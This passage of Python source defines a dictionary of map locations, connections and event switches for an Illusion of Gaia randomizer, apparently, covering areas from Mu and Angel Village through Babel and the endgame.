239: [False, [], 2, [3,12,2,b"\x00"], 0, "Mu: Map 101 (bottom)", [], False, [], [], [], [], [], [], [], []],
240: [False, [], 2, [3,12,0,b"\x00"], 0, "Mu: Map 102 (pedestals)", [19, 19], False, [], [], [], [], [], [], [], []],
241: [False, [], 2, [3,12,0,b"\x00"], 0, "Mu: Map 102 (statues placed)", [], False, [], [], [], [], [], [], [], []], # might need an exit for this
242: [False, [], 2, [3,12,0,b"\x00"], 0, "Mu: Map 102 (statue get)", [], False, [], [], [], [], [], [], [], []],
243: [False, [244], 2, [3,12,0,b"\x00"], 0, "Mu: Boss Room (entryway)", [], False, [], [], [], [], [], [], [], []], # Might need to add an exit for this?
244: [False, [242,243], 2, [3,12,0,b"\x00"], 0, "Mu: Boss Room (main)", [], True, [], [], [], [], [], [], [], []],
245: [False, [212], 2, [3,12,0,b"\x00"], 0, "Mu: Map 95 (top, Slider exit)", [], False, [], [], [], [], [], [], [], []],
246: [False, [226], 2, [3,12,0,b"\x00"], 0, "Mu: Map 98 (top, Slider exit)", [], False, [], [], [], [], [], [], [], []],
247: [False, [231,511], 0, [3,12,0,b"\x00"], 0, "Mu: Water lowered 1", [], False, [], [], [], [], [], [], [], []],
248: [False, [232,512], 0, [3,12,0,b"\x00"], 0, "Mu: Water lowered 2", [], False, [], [], [], [], [], [], [], []],
# Angel Village
250: [False, [12], 1, [3,13,0,b"\x00"], 0, "Angel Village: Outside", [], True, [], [], [], [], [], [], [], []],
251: [False, [1], 2, [3,13,0,b"\x00"], 0, "Angel Village: Underground", [], False, [], [], [], [], [], [], [], []],
252: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Village: Room 1", [], False, [], [], [], [], [], [], [], []],
253: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Village: Room 2", [], False, [], [], [], [], [], [], [], []],
254: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Village: Dance Hall", [], False, [], [], [], [], [], [], [], []],
255: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Village: DS Room", [], False, [], [], [], [], [], [], [], []],
#256: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Village: Room 3", [], False, [], [], [], [], [], [], [], []],
# Angel Dungeon
260: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 109", [], False, [], [], [], [], [], [], [], []],
261: [False, [278], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 110 (main)", [], False, [], [], [], [], [], [], [], []],
262: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 111", [], False, [], [], [], [], [], [], [], []],
263: [False, [279], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 112 (main)", [], False, [], [], [], [], [], [], [], []],
264: [False, [263], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 112 (slider)", [], False, [], [], [], [], [], [], [], []],
265: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 112 (alcove)", [], False, [], [], [], [], [], [], [], []],
266: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 113", [], False, [], [], [], [], [], [], [], []],
267: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 114 (main)", [], False, [], [], [], [], [], [], [], []],
268: [False, [267], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 114 (slider exit)", [], False, [], [], [], [], [], [], [], []],
269: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 115 (main)", [], False, [], [], [], [], [], [], [], []],
270: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 116 (portrait room)", [], False, [], [], [], [], [], [], [], []],
271: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 116 (side room)", [], False, [], [], [], [], [], [], [], []],
272: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 116 (Ishtar's room)", [], False, [], [], [], [], [], [], [], []],
273: [False, [272], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 116 (Ishtar's chest)", [], False, [], [], [], [], [], [], [], []],
274: [False, [513], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Puzzle Room", [], False, [], [], [], [], [], [], [], []],
275: [False, [265], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 112 (alcove slider)", [], False, [], [], [], [], [], [], [], []],
276: [False, [277], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 115 (slider exit)", [], False, [], [], [], [], [], [], [], []],
277: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 115 (foyer)", [], False, [], [], [], [], [], [], [], []],
278: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 110 (past Draco)", [], False, [], [], [], [], [], [], [], []],
279: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 112 (past Draco)", [], False, [], [], [], [], [], [], [], []],
# Watermia
280: [False, [12], 1, [3,14,0,b"\x00"], 0, "Watermia: Main Area", [24], False, [], [], [], [], [], [], [], []],
#281: [False, [15,280], 0, [3,14,0,b"\x00"], 0, "Watermia: Bridge Man", [], False, [], [], [], [], [], [], [], []],
282: [False, [], 2, [3,14,0,b"\x00"], 0, "Watermia: DS House", [], False, [], [], [], [], [], [], [], []],
283: [False, [1], 2, [3,14,0,b"\x00"], 0, "Watermia: Gambling House", [], False, [], [], [], [], [], [], [], []],
284: [False, [], 2, [3,14,0,b"\x00"], 0, "Watermia: West House", [], False, [], [], [], [], [], [], [], []],
285: [False, [], 2, [3,14,0,b"\x00"], 0, "Watermia: East House", [], False, [], [], [], [], [], [], [], []],
286: [False, [], 2, [3,14,0,b"\x00"], 0, "Watermia: Lance's House", [], False, [], [], [], [], [], [], [], []],
287: [False, [], 2, [3,14,0,b"\x00"], 0, "Watermia: NW House", [], False, [], [], [], [], [], [], [], []],
288: [False, [280], 0, [3,14,0,b"\x00"], 0, "Watermia: Stablemaster", [], True, [], [], [], [], [], [], [], []],
# Great Wall
290: [False, [12], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 130", [], False, [], [], [], [], [], [], [], []],
291: [False, [292], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 131 (NW)", [], False, [], [], [], [], [], [], [], []],
292: [False, [293], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 131 (S)", [], False, [], [], [], [], [], [], [], []],
293: [False, [], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 131 (NE)", [], False, [], [], [], [], [], [], [], []],
294: [False, [296], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 133 (W)", [], False, [], [], [], [], [], [], [], []],
295: [False, [296], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 133 (center)", [], False, [], [], [], [], [], [], [], []],
296: [False, [], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 133 (E)", [], False, [], [], [], [], [], [], [], []],
297: [False, [], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 134", [], False, [], [], [], [], [], [], [], []],
298: [False, [], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 135 (W)", [], False, [], [], [], [], [], [], [], []],
299: [False, [], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 135 (E)", [], False, [], [], [], [], [], [], [], []],
300: [False, [], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 136 (W)", [], False, [], [], [], [], [], [], [], []],
301: [False, [], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 136 (E)", [], False, [], [], [], [], [], [], [], []],
302: [False, [303], 2, [3,15,0,b"\x00"], 0, "Great Wall: Boss Room (entrance)", [], False, [], [], [], [], [], [], [], []],
303: [False, [], 2, [3,15,0,b"\x00"], 0, "Great Wall: Boss Room (exit)", [], False, [], [], [], [], [], [], [], []],
# Euro
310: [False, [13], 1, [4,16,0,b"\x00"], 0, "Euro: Main Area", [24], False, [], [], [], [], [], [], [], []],
311: [False, [310], 0, [4,16,0,b"\x00"], 0, "Euro: Stablemaster", [], True, [], [], [], [], [], [], [], []],
312: [False, [], 2, [4,16,0,b"\x00"], 0, "Euro: Rolek Company", [], False, [], [], [], [], [], [], [], []],
313: [False, [], 2, [4,16,0,b"\x00"], 0, "Euro: West House", [], False, [], [], [], [], [], [], [], []],
314: [False, [], 2, [4,16,0,b"\x00"], 0, "Euro: Rolek Mansion", [40], False, [], [], [], [], [], [], [], []],
315: [False, [314], 0, [4,16,0,b"\x00"], 0, "Euro: Ann", [], False, [], [], [], [], [], [], [], []],
316: [False, [], 2, [4,16,0,b"\x00"], 0, "Euro: Guest Room", [], False, [], [], [], [], [], [], [], []],
317: [False, [], 2, [4,16,0,b"\x00"], 0, "Euro: Central House", [], False, [], [], [], [], [], [], [], []],
318: [False, [1], 2, [4,16,0,b"\x00"], 0, "Euro: Jeweler House", [], False, [], [], [], [], [], [], [], []],
319: [False, [], 2, [4,16,0,b"\x00"], 0, "Euro: Twins House", [], False, [], [], [], [], [], [], [], []],
320: [False, [], 2, [4,16,0,b"\x00"], 0, "Euro: Hidden House", [], False, [], [], [], [], [], [], [], []],
321: [False, [], 2, [4,16,0,b"\x00"], 0, "Euro: Shrine", [], False, [], [], [], [], [], [], [], []],
322: [False, [], 2, [4,16,0,b"\x00"], 0, "Euro: Explorer's House", [], False, [], [], [], [], [], [], [], []],
323: [False, [324], 2, [4,16,0,b"\x00"], 0, "Euro: Store Entrance", [], False, [], [], [], [], [], [], [], []],
324: [False, [], 2, [4,16,0,b"\x00"], 0, "Euro: Store Exit", [], False, [], [], [], [], [], [], [], []],
325: [False, [], 2, [4,16,0,b"\x00"], 0, "Euro: Dark Space House", [], False, [], [], [], [], [], [], [], []],
# Mt. Kress
330: [False, [13], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 160", [], False, [], [], [], [], [], [], [], []],
331: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 161 (E)", [], False, [], [], [], [], [], [], [], []],
332: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 161 (W)", [], False, [], [], [], [], [], [], [], []],
333: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 162 (main)", [26], False, [], [], [], [], [], [], [], []],
334: [False, [333], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 162 (S)", [], False, [], [], [], [], [], [], [], []],
335: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 162 (NW)", [], False, [], [], [], [], [], [], [], []],
336: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 162 (SE)", [], False, [], [], [], [], [], [], [], []],
337: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 163", [], False, [], [], [], [], [], [], [], []],
338: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 164", [], False, [], [], [], [], [], [], [], []],
339: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 165 (S)", [26], False, [], [], [], [], [], [], [], []],
340: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 165 (NE)", [26], False, [], [], [], [], [], [], [], []],
341: [False, [338], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 165 (NW)", [], False, [], [], [], [], [], [], [], []],
342: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 166", [], False, [], [], [], [], [], [], [], []],
343: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 167", [], False, [], [], [], [], [], [], [], []],
344: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 168", [], False, [], [], [], [], [], [], [], []],
345: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 169", [], False, [], [], [], [], [], [], [], []],
# Natives' Village
350: [False, [13], 1, [4,18,0,b"\x00"], 0, "Natives' Village: Main Area", [10], False, [], [], [], [], [], [], [], []],
351: [False, [350], 0, [4,18,0,b"\x00"], 0, "Natives' Village: Child Guide", [], True, [], [], [], [], [], [], [], []],
352: [False, [], 2, [4,18,0,b"\x00"], 0, "Natives' Village: West House", [], False, [], [], [], [], [], [], [], []],
353: [False, [], 2, [4,18,0,b"\x00"], 0, "Natives' Village: House w/Statues", [29], False, [], [], [], [], [], [], [], []],
354: [False, [353], 0, [4,18,0,b"\x00"], 0, "Natives' Village: Statues Awake", [], False, [], [], [], [], [], [], [], []],
# Ankor Wat
360: [False, [13], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 176", [], False, [], [], [], [], [], [], [], []],
361: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 177 (E)", [], False, [], [], [], [], [], [], [], []],
362: [False, [361], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 177 (W)", [], False, [], [], [], [], [], [], [], []],
363: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 178 (S)", [], False, [], [], [], [], [], [], [], []],
364: [False, [363], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 178 (center)", [], False, [], [], [], [], [], [], [], []],
365: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 178 (N)", [], False, [], [], [], [], [], [], [], []],
366: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 179 (E)", [], False, [], [], [], [], [], [], [], []],
367: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 179 (W)", [], False, [], [], [], [], [], [], [], []],
368: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 180", [], False, [], [], [], [], [], [], [], []],
369: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 181 (N)", [], False, [], [], [], [], [], [], [], []],
370: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 181 (center)", [], False, [], [], [], [], [], [], [], []],
371: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 181 (S)", [], False, [], [], [], [], [], [], [], []],
372: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 182", [], False, [], [], [], [], [], [], [], []],
373: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 183 (S)", [], False, [], [], [], [], [], [], [], []],
374: [False, [373], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 183 (NW)", [], False, [], [], [], [], [], [], [], []],
375: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 183 (NE)", [], False, [], [], [], [], [], [], [], []],
376: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 184 (S)", [], False, [], [], [], [], [], [], [], []],
377: [False, [376], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 184 (N)", [], False, [], [], [], [], [], [], [], []],
378: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 185", [], False, [], [], [], [], [], [], [], []],
379: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 186 (main)", [], False, [], [], [], [], [], [], [], []],
380: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 186 (NE)", [], False, [], [], [], [], [], [], [], []],
381: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 187 (main)", [], False, [], [], [], [], [], [], [], []],
382: [False, [381], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 187 (chest)", [], False, [], [], [], [], [], [], [], []],
383: [False, [381], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 187 (Dark Space)", [], False, [], [], [], [], [], [], [], []],
384: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 188 (N bright)", [], False, [], [], [], [], [], [], [], []],
385: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 188 (S bright)", [], False, [], [], [], [], [], [], [], []],
386: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 189 (floor S)", [], False, [], [], [], [], [], [], [], []],
387: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 189 (floor N)", [], False, [], [], [], [], [], [], [], []],
388: [False, [386], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 189 (platform)", [], False, [], [], [], [], [], [], [], []],
389: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 190 (E)", [], False, [], [], [], [], [], [], [], []],
390: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 190 (W)", [], False, [], [], [], [], [], [], [], []],
391: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 191", [], False, [], [], [], [], [], [], [], []],
392: [False, [384], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 188 (N)", [], False, [], [], [], [], [], [], [], []],
393: [False, [385], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 188 (S)", [], False, [], [], [], [], [], [], [], []],
# Dao
400: [False, [1,14], 1, [5,20,0,b"\x00"], 0, "Dao: Main Area", [], False, [], [], [], [], [], [], [], []],
401: [False, [], 2, [5,20,0,b"\x00"], 0, "Dao: NW House", [], False, [], [], [], [], [], [], [], []],
402: [False, [], 2, [5,20,0,b"\x00"], 0, "Dao: Neil's House", [], False, [], [], [], [], [], [], [], []],
403: [False, [], 2, [5,20,0,b"\x00"], 0, "Dao: Snake Game", [], False, [], [], [], [], [], [], [], []],
404: [False, [], 2, [5,20,0,b"\x00"], 0, "Dao: SW House", [], False, [], [], [], [], [], [], [], []],
405: [False, [], 2, [5,20,0,b"\x00"], 0, "Dao: S House", [], False, [], [], [], [], [], [], [], []],
406: [False, [], 2, [5,20,0,b"\x00"], 0, "Dao: SE House", [], False, [], [], [], [], [], [], [], []],
# Pyramid
410: [False, [14], 2, [5,21,0,b"\x00"], 0, "Pyramid: Entrance (main)", [], False, [], [], [], [], [], [], [], []],
411: [False, [410], 2, [5,21,0,b"\x00"], 0, "Pyramid: Entrance (behind orbs)", [], False, [], [], [], [], [], [], [], []],
412: [False, [413], 2, [5,21,0,b"\x00"], 0, "Pyramid: Entrance (hidden platform)", [], False, [], [], [], [], [], [], [], []],
413: [False, [411], 2, [5,21,0,b"\x00"], 0, "Pyramid: Entrance (bottom)", [], False, [], [], [], [], [], [], [], []],
414: [False, [411], 2, [5,21,0,b"\x00"], 0, "Pyramid: Entrance (boss entrance)", [], False, [], [], [], [], [], [], [], []],
415: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Hieroglyph room", [30, 31, 32, 33, 34, 35, 38], False, [], [], [], [], [], [], [], []],
416: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 206 (E)", [], False, [], [], [], [], [], [], [], []],
417: [False, [416], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 206 (W)", [], False, [], [], [], [], [], [], [], []],
418: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 207 (NE)", [], False, [], [], [], [], [], [], [], []],
419: [False, [411], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 207 (SW)", [], False, [], [], [], [], [], [], [], []],
420: [False, [421], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 208 (N)", [], False, [], [], [], [], [], [], [], []],
421: [False, [420], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 208 (S)", [], False, [], [], [], [], [], [], [], []],
422: [False, [423], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 209 (W)", [], False, [], [], [], [], [], [], [], []],
423: [False, [422,411], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 209 (E)", [], False, [], [], [], [], [], [], [], []],
424: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 210", [], False, [], [], [], [], [], [], [], []],
425: [False, [411], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 211", [], False, [], [], [], [], [], [], [], []],
426: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 212 (N)", [], False, [], [], [], [], [], [], [], []],
427: [False, [426], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 212 (center)", [], False, [], [], [], [], [], [], [], []],
428: [False, [411], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 212 (SE)", [], False, [], [], [], [], [], [], [], []],
429: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 212 (SW)", [], False, [], [], [], [], [], [], [], []],
430: [False, [411], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 213", [], False, [], [], [], [], [], [], [], []],
431: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 214 (NW)", [], False, [], [], [], [], [], [], [], []],
432: [False, [431], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 214 (NE)", [], False, [], [], [], [], [], [], [], []],
433: [False, [431,434], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 214 (SE)", [], False, [], [], [], [], [], [], [], []],
434: [False, [433], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 214 (SW)", [], False, [], [], [], [], [], [], [], []],
435: [False, [411], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 215 (main)", [], False, [], [], [], [], [], [], [], []],
436: [False, [437], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 216 (N)", [], False, [], [], [], [], [], [], [], []],
437: [False, [411], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 216 (S)", [], False, [], [], [], [], [], [], [], []],
438: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 217 (W)", [], False, [], [], [], [], [], [], [], []],
439: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 217 (E)", [], False, [], [], [], [], [], [], [], []],
440: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 219 (W)", [], False, [], [], [], [], [], [], [], []],
441: [False, [411], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 219 (E)", [], False, [], [], [], [], [], [], [], []],
442: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Hieroglyph 1", [], False, [], [], [], [], [], [], [], []],
443: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Hieroglyph 2", [], False, [], [], [], [], [], [], [], []],
444: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Hieroglyph 3", [], False, [], [], [], [], [], [], [], []],
445: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Hieroglyph 4", [], False, [], [], [], [], [], [], [], []],
446: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Hieroglyph 5", [], False, [], [], [], [], [], [], [], []],
447: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Hieroglyph 6", [], False, [], [], [], [], [], [], [], []],
448: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Boss Room", [], True, [], [], [], [], [], [], [], []],
449: [False, [415,517], 0, [5,21,0,b"\x00"], 0, "Pyramid: Hieroglyphs Placed", [], False, [], [], [], [], [], [], [], []],
450: [False, [411], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 215 (past Killer 6)", [], False, [], [], [], [], [], [], [], []],
# Babel
460: [False, [], 2, [6,22,0,b"\x00"], 0, "Babel: Foyer", [], False, [], [], [], [], [], [], [], []],
461: [False, [], 2, [6,22,0,b"\x00"], 0, "Babel: Map 223 (bottom)", [], False, [], [], [], [], [], [], [], []],
462: [False, [461], 2, [6,22,0,b"\x00"], 0, "Babel: Map 223 (top)", [], False, [], [], [], [], [], [], [], []],
463: [False, [518,519],2, [6,22,0,b"\x00"], 0, "Babel: Map 224 (bottom)", [], False, [], [], [], [], [], [], [], []],
464: [False, [520,521],2, [6,22,0,b"\x00"], 0, "Babel: Map 224 (top)", [], False, [], [], [], [], [], [], [], []],
465: [False, [466], 2, [6,22,0,b"\x00"], 0, "Babel: Map 225 (SW)", [], False, [], [], [], [], [], [], [], []],
466: [False, [], 2, [6,22,0,b"\x00"], 0, "Babel: Map 225 (NW)", [], False, [], [], [], [], [], [], [], []],
467: [False, [468], 2, [6,22,0,b"\x00"], 0, "Babel: Map 225 (SE)", [], False, [], [], [], [], [], [], [], []],
468: [False, [], 2, [6,22,0,b"\x00"], 0, "Babel: Map 225 (NE)", [], False, [], [], [], [], [], [], [], []],
469: [False, [470], 2, [6,22,0,b"\x00"], 0, "Babel: Map 226 (bottom)", [], False, [], [], [], [], [], [], [], []],
470: [False, [], 2, [6,22,0,b"\x00"], 0, "Babel: Map 226 (top)", [], False, [], [], [], [], [], [], [], []],
471: [False, [522], 2, [6,22,0,b"\x00"], 0, "Babel: Map 227 (bottom)", [], False, [], [], [], [], [], [], [], []],
472: [False, [], 2, [6,22,0,b"\x00"], 0, "Babel: Map 227 (top)", [], False, [], [], [], [], [], [], [], []],
473: [False, [], 2, [6,22,0,b"\x00"], 0, "Babel: Olman's Room", [], False, [], [], [], [], [], [], [], []],
474: [False, [], 0, [6,22,0,b"\x00"], 0, "Babel: Castoth", [], False, [], [], [], [], [], [], [], []],
475: [False, [], 0, [6,22,0,b"\x00"], 0, "Babel: Viper", [], False, [], [], [], [], [], [], [], []],
476: [False, [], 0, [6,22,0,b"\x00"], 0, "Babel: Vampires", [], False, [], [], [], [], [], [], [], []],
477: [False, [], 0, [6,22,0,b"\x00"], 0, "Babel: Sand Fanger", [], False, [], [], [], [], [], [], [], []],
478: [False, [], 0, [6,22,0,b"\x00"], 0, "Babel: Mummy Queen", [], False, [], [], [], [], [], [], [], []],
479: [False, [473], 0, [6,22,0,b"\x00"], 0, "Babel: Statue Get", [], False, [], [], [], [], [], [], [], []],
# Jeweler's Mansion
480: [False, [], 2, [6,23,0,b"\x00"], 0, "Jeweler's Mansion: Main", [], False, [], [], [], [], [], [], [], []],
481: [False, [], 2, [6,23,0,b"\x00"], 0, "Jeweler's Mansion: Behind Psycho Slider", [], False, [], [], [], [], [], [], [], []],
482: [False, [523], 2, [6,23,0,b"\x00"], 0, "Jeweler's Mansion: Solid Arm", [], False, [], [], [], [], [], [], [], []],
# Game End
490: [False, [500], 0, [0,0,0,b"\x00"], 0, "Kara Released", [], False, [], [], [], [], [], [], [], []],
491: [False, [], 0, [0,0,0,b"\x00"], 0, "Firebird", [], False, [], [], [], [], [], [], [], []],
492: [False, [491], 0, [0,0,0,b"\x00"], 0, "Dark Gaia/End Game", [], False, [], [], [], [], [], [], [], []],
# Event Switches
500: [False, [], 0, [0,0,0,b"\x00"], 0, "Kara ", [], False, [], [], [], [], [], [], [], []],
501: [False, [], 0, [0,0,0,b"\x00"], 0, "Lilly ", [], False, [], [], [], [], [], [], [], []],
502: [False, [], 0, [0,0,0,b"\x00"], 0, "Moon Tribe: Spirits Healed ", [], False, [], [], [], [], [], [], [], []],
503: [False, [], 0, [0,0,0,b"\x00"], 0, "Inca: Castoth defeated ", [], False, [], [], [], [], [], [], [], []],
504: [False, [], 0, [0,0,0,b"\x00"], 0, "Freejia: Found Laborer ", [], False, [], [], [], [], [], [], [], []],
505: [False, [], 0, [0,0,0,b"\x00"], 0, "Neil's Memory Restored ", [], False, [], [], [], [], [], [], [], []],
506: [False, [], 0, [0,0,0,b"\x00"], 0, "Sky Garden: Map 82 NW Switch ", [], False, [], [], [], [], [], [], [], []],
507: [False, [], 0, [0,0,0,b"\x00"], 0, "Sky Garden: Map 82 NE Switch ", [], False, [], [], [], [], [], [], [], []],
508: [False, [], 0, [0,0,0,b"\x00"], 0, "Sky Garden: Map 82 SE Switch ", [], False, [], [], [], [], [], [], [], []],
509: [False, [], 0, [0,0,0,b"\x00"], 0, "Sky Garden: Map 84 Switch ", [], False, [], [], [], [], [], [], [], []],
510: [False, [], 0, [0,0,0,b"\x00"], 0, "Seaside: Fountain Purified ", [], False, [], [], [], [], [], [], [], []],
511: [False, [], 0, [0,0,0,b"\x00"], 0, "Mu: Water Lowered 1 ", [], False, [], [], [], [], [], [], [], []],
512: [False, [], 0, [0,0,0,b"\x00"], 0, "Mu: Water Lowered 2 ", [], False, [], [], [], [], [], [], [], []],
513: [False, [], 0, [0,0,0,b"\x00"], 0, "Angel: Puzzle Complete ", [], False, [], [], [], [], [], [], [], []],
514: [False, [333,335], 0, [0,0,0,b"\x00"], 0, "Mt Kress: Drops used 1 ", [], False, [], [], [], [], [], [], [], []],
515: [False, [339,340], 0, [0,0,0,b"\x00"], 0, "Mt Kress: Drops used 2 ", [], False, [], [], [], [], [], [], [], []],
516: [False, [340,341], 0, [0,0,0,b"\x00"], 0, "Mt Kress: Drops used 3 ", [], False, [], [], [], [], [], [], [], []],
517: [False, [], 0, [0,0,0,b"\x00"], 0, "Pyramid: Hieroglyphs placed ", [], False, [], [], [], [], [], [], [], []],
518: [False, [], 0, [0,0,0,b"\x00"], 0, "Babel: Castoth defeated ", [], False, [], [], [], [], [], [], [], []],
519: [False, [], 0, [0,0,0,b"\x00"], 0, "Babel: Viper defeated ", [], False, [], [], [], [], [], [], [], []],
520: [False, [], 0, [0,0,0,b"\x00"], 0, "Babel: Vampires defeated ", [], False, [], [], [], [], [], [], [], []],
521: [False, [], 0, [0,0,0,b"\x00"], 0, "Babel: Sand Fanger defeated ", [], False, [], [], [], [], [], [], [], []],
522: [False, [], 0, [0,0,0,b"\x00"], 0, "Babel: Mummy Queen defeated ", [], False, [], [], [], [], [], [], [], []],
523: [False, [], 0, [0,0,0,b"\x00"], 0, "Mansion: Solid Arm defeated ", [], False, [], [], [], [], [], [], [], []],
# Misc
600: [False, [], 0, [0,0,0,b"\x00"], 0, "Freedan Access ", [], False, [], [], [], [], [], [], [], []],
601: [False, [], 0, [0,0,0,b"\x00"], 0, "Glitches ", [], False, [], [], [], [], [], [], [], []],
602: [False, [], 0, [0,0,0,b"\x00"], 0, "Early Firebird ", [], False, [], [], [], [], [], [], [], []],
